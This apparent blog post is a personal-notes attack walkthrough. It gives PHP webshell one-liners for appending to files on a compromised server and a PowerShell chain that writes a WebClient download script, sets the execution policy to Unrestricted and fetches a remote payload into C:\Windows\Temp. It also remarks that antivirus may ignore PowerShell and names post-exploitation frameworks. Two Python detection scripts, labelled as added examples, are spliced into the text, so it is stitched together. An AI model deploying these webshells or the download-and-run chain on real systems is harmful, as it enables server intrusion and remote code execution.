From SHELL to POWERSHELL

Just keeping this for my own notes and reference, because sometimes it is hard to recall the how-to.

See 'clam' for more and `bash' for a shell script!


            ___
        .-"; ! ;"-.
      .'!  : | :  !`.
     /\  ! : ! : !  /\
    /\ |  ! :|: !  | /\
   (  \ \ ; :!: ; / /  )
  ( `. \ | !:|:! | / .' )
  (`. \ \ \!:|:!/ / / .')
   \ `.`.\ |!|! |/,'.' /
    `._`.\\\!!!// .'_.'
       `.`.\\|//.'.'
        |`._`n'_.'|  hjw
        "----^----"

OK, let's assume that we are able to inject some malicious payload/code on the target, e.g. via phpMyAdmin or whatever low-hanging fruit is there: SQLi, RCE or whatever.

1. For PHP, these are the useful snippets:
========
PHP Info
========

<?php phpinfo(); ?>

This is useful for identifying file paths, the default folder, etc.

================
Simple PHP Backdoor
================

<?php system($_GET['cmd']); ?>

or

<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>

The second one is the 'cleanest' version. Both snippets fit on a single line, so we can simply append them to any other file we like.
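Since both one-liners are meant to be appended to an existing file, the defender's counterpart is a scanner that walks PHP sources and flags an OS-command function whose argument comes (directly, or via a variable) from a request superglobal. The following is an added example written for this post, not code from the original page; the sample file, and the list of functions it treats as dangerous, are constructed assumptions.

```python
import re

# PHP functions that hand a string to the OS shell or to the evaluator.
EXEC_FUNCS = r"(?:system|exec|shell_exec|passthru|popen|proc_open|eval|assert)"
# Superglobals whose content the remote client controls.
REQUEST_VARS = r"\$_(?:GET|POST|REQUEST|COOKIE)\s*\["

EXEC_RE = re.compile(rf"\b{EXEC_FUNCS}\s*\(", re.IGNORECASE)
REQ_RE = re.compile(REQUEST_VARS)
PHPINFO_RE = re.compile(r"\bphpinfo\s*\(", re.IGNORECASE)
# "$var = $_REQUEST['x']" or "$var = ($_REQUEST['x'])": $var becomes tainted.
VAR_ASSIGN_RE = re.compile(rf"(\$\w+)\s*=\s*\(?\s*{REQUEST_VARS}")


def scan_php(source: str):
    """Return (line_no, rule, line_text) for every suspicious line in a PHP source."""
    findings = []
    tainted = set()  # variables assigned straight from request data so far
    for lineno, line in enumerate(source.splitlines(), 1):
        for m in VAR_ASSIGN_RE.finditer(line):
            tainted.add(m.group(1))
        if PHPINFO_RE.search(line):
            findings.append((lineno, "phpinfo", line.strip()))
        for m in EXEC_RE.finditer(line):
            arg = line[m.end():]  # text after the opening parenthesis
            from_request = REQ_RE.search(arg) is not None
            from_tainted = any(re.search(re.escape(v) + r"\b", arg) for v in tainted)
            if from_request or from_tainted:
                findings.append((lineno, "exec-from-request", line.strip()))
                break  # one finding per line is enough
    return findings


# Constructed sample: an ordinary page with the two one-liners (and phpinfo) appended.
SAMPLE = """<?php
// constructed sample page
$title = "Welcome";
echo "<h1>$title</h1>";
system("date");           // hard-coded argument, not attacker controlled
?>
<?php system($_GET['cmd']); ?>
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
<?php phpinfo(); ?>
"""

if __name__ == "__main__":
    for lineno, rule, text in scan_php(SAMPLE):
        print(f"line {lineno}: {rule}: {text}")
```

The hard-coded system("date") on line 5 is deliberately left unflagged: the signal is not the function name but request-controlled input reaching it, which is exactly what both one-liners above do. Run it over a web root with a loop over *.php files to catch the appended variant this post describes.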

2. How we perform the privilege escalation attack depends on the target platform, i.e. whether the target is running Windows or Linux. These two have different methods for doing it.

If the target is running Windows we can use PowerShell. As we know, most Windows versions have PowerShell by default. The good thing about PowerShell is that some anti-virus/anti-malware products ignore the commands it executes.

As we know, Windows does not have a wget or curl command for downloading from external resources. To do that, using the shell we appended earlier, we can use the echo command to write a new payload file that does it for us.

First we create a new file called download.ps1:
================
Copy & Execute This
================

echo param($url, $filename) > download.ps1
echo $client = new-object System.Net.WebClient >> download.ps1
echo $client.DownloadFile( $url, $filename); >> download.ps1

The resulting file should contain the lines we echoed, one per line, like this:

$ type download.ps1

param($url, $filename)
$client = new-object System.Net.WebClient
$client.DownloadFile( $url, $filename);

Next run this command:

$ powershell Set-ExecutionPolicy Unrestricted

This is to make sure that we have no restrictions while running the script.

$ powershell -ExecutionPolicy RemoteSigned -File "download.ps1" "http://somewhere.com/filename.ext" "C:\Windows\Temp\filename.ext"

This is the last command we want to run. Make sure that both the URL and the file path are set correctly before executing it.
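Every step of this procedure leaves a distinct trace in process-creation logging: a web-server process spawning cmd.exe or powershell.exe, an echo redirected into a .ps1 file, Set-ExecutionPolicy Unrestricted, an -ExecutionPolicy override on the powershell command line (which on its own already makes the earlier policy change unnecessary), the System.Net.WebClient download cradle, and a drop into C:\Windows\Temp. The triage script below is an added example for this post, not code from the page or from any of the tools it mentions; the key=value event format, the parent-process list and the four sample events are constructed assumptions.

```python
import re

# Web-facing processes that should not normally be the parent of a shell (assumed list).
WEB_PARENTS = {"php-cgi.exe", "php.exe", "w3wp.exe", "httpd.exe", "nginx.exe"}

# Command-line indicators for the download-and-run steps described in the post.
RULES = {
    "execution_policy_change": re.compile(
        r"Set-ExecutionPolicy\s+(?:Unrestricted|Bypass)", re.IGNORECASE),
    "execution_policy_override": re.compile(
        r"powershell(?:\.exe)?\b.*?\s-(?:ExecutionPolicy|ep)\s+\w+", re.IGNORECASE),
    "webclient_download": re.compile(
        r"WebClient|Download(?:File|String)\s*\(", re.IGNORECASE),
    "script_written_by_echo": re.compile(
        r"\becho\b.*>>?\s*\S+\.ps1", re.IGNORECASE),
    "temp_dir_path": re.compile(
        r"\\(?:Windows\\Temp|AppData\\Local\\Temp)\\", re.IGNORECASE),
}

# Constructed event format: space-separated key=value pairs, quoted when containing spaces.
FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_event(line: str) -> dict:
    """Split one constructed process-creation event into a field dict."""
    return {key: val.strip('"') for key, val in FIELD_RE.findall(line)}


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(line: str) -> list:
    """Return the names of every indicator that fires on one event (empty if none)."""
    ev = parse_event(line)
    cmd = ev.get("CommandLine", "")
    hits = [name for name, rx in RULES.items() if rx.search(cmd)]
    if basename(ev.get("ParentImage", "")) in WEB_PARENTS:
        hits.insert(0, "web_server_spawned_process")
    return hits


def triage(lines):
    """Keep only events with at least one hit, numbered by position in the input."""
    return [(i, evaluate(l)) for i, l in enumerate(lines, 1) if evaluate(l)]


# Constructed sample events mirroring the steps above, plus one benign scheduled script.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    r'ParentImage=C:\php\php-cgi.exe Image=C:\Windows\System32\cmd.exe '
    r'CommandLine="cmd.exe /c echo $client = new-object System.Net.WebClient >> download.ps1"',
    rf'ParentImage=C:\php\php-cgi.exe Image={PS} '
    r'CommandLine="powershell Set-ExecutionPolicy Unrestricted"',
    rf'ParentImage=C:\php\php-cgi.exe Image={PS} '
    r'CommandLine="powershell -ExecutionPolicy RemoteSigned -File download.ps1 '
    r'http://example.invalid/filename.ext C:\Windows\Temp\filename.ext"',
    rf'ParentImage=C:\Windows\explorer.exe Image={PS} '
    r'CommandLine="powershell -File C:\scripts\backup.ps1"',
]

if __name__ == "__main__":
    for i, hits in triage(SAMPLE_EVENTS):
        print(f"event {i}: {', '.join(hits)}")
```

The strongest single signal is the parent process: a PHP or IIS worker spawning cmd.exe or powershell.exe is rare in normal operation and is what the webshell from step 1 looks like from the host side. The command-line rules then tell you which step of the chain you are looking at.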

Another thing I have been wondering about regarding PowerShell: is there a webshell for PowerShell? Yes, there is! While doing some Googling I found "Antak-WebShell". It is written in ASP.NET and does not support PHP :( But if you get lucky, some Microsoft web servers run both PHP and IIS, and that is where we can use it.


Since we have this nice webshell we can rely on other tools like Empire, PowerSploit or Nishang for post-exploitation.

As for the conclusion: the step-by-step walkthrough may be painful, or you might get stuck while working on it. Maybe you have a better technique to simplify it? Anyway, good luck with spawning the $HELL. Cheers!!!
